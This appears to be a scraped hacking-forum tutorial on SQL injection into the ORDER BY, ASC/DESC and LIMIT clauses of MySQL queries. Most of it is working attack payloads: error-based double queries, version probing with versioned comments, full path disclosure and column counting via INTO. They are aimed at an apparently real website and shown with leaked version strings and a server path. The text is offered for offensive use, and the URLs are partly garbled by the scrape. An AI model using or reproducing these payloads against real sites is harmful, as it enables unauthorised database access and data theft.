this tut will give you instructions how to inject after order by/limit.
like that
PHP Code:
SELET * FROM page WHERE id = 1 ORDER BY id [ here ] ASC [ here ] LIMIT 10 , 10 [ here ]
here - injection point. we cant use union after those clauses,so we gonna play with the other things we can do. after order by id [here] using double query. if we have this site
Code:
http://HdhCmsTest2cto测试数据 /include/products.php?sb=id
the injection point is after order by. i know i can use union in another onjection point,i do it for the tut. after order by its simple,the only things we cant use is- union,having,where,and some more things that dosent matter. we can use 'and' for double query.
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
'5.0.95-community' (i used the table 'products' because i can see that this table exist from the error. if you cant see the table,use 'information_schema.columns'.) after desc/asc [here] using double query. if we have this site
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?sb=id desc'
the injection point is after desc. after desc/asc its little more problem,because we cant use- union,having,where,and,or,xor,*,>,so we cant execute our query. so we add a comma,and the double query after that.
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?sb=id desc,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
'5.0.95-community' note -if the injection point is like that-
PHP Code:
SELECT * FROM page WHERE id = 1 ORDER BY [ here ] id
just add '1' and inject like that first example.
Code:
1 and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
after limit 10,10 [here] using some tricks. like this site-
Code:
injetion point after limit clause. when the injection point is after limit clause,we cant do anything,only those commands- offset,into,into outfile/dumpfile,/*!*/,for update,lock in share mode. so we try to exploit what we can. toc- get the version full path disclosure find column count get the version (thanks to lolalu0) we can use comments for getting the mysql version. we can guess it,and if its true,the page will not load,just like blind,but different.
Code:
http://HdhCmsTest2cto测试数据 /include/products.php?rw=10 /*!50094aaaa*/
page dont load-version bigger then 5.00.94
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 /*!50096aaaa*/
page load normally- version smaller than 5.00.96
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 /*!50095aaaa*/
page dont load- version is 5.00.95. FPD for Full Path Disclosure,we can 0 or /**/ the limit clause,and error with the full path will appear,even mysql_error is on. for example
Code:
final query-
PHP Code:
select * from .... limit 0 , 0
and we can also
Code:
Warning: Division by zero in /home/teletec/public_ html / include/products.php on line 164 find the column count using into. its not really will help,but its nice trick. if we have this site-
Code:
injection point is after limit. we can count the columns like that-
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 into @
error 1222. not 1 column.
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 into @,@
error 1222. not 2 column. and so on until-
Code:
http://HdhCmsTestteletec测试数据.pk/include/products.php?rw=10 into @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
error 1172 "Result consisted of more than one row". 60 columns. hope you learned something 作者 JUST FUCK IT!查看更多关于Bypass 'Incorrect usage of UNION and ORDER BY的详细内容...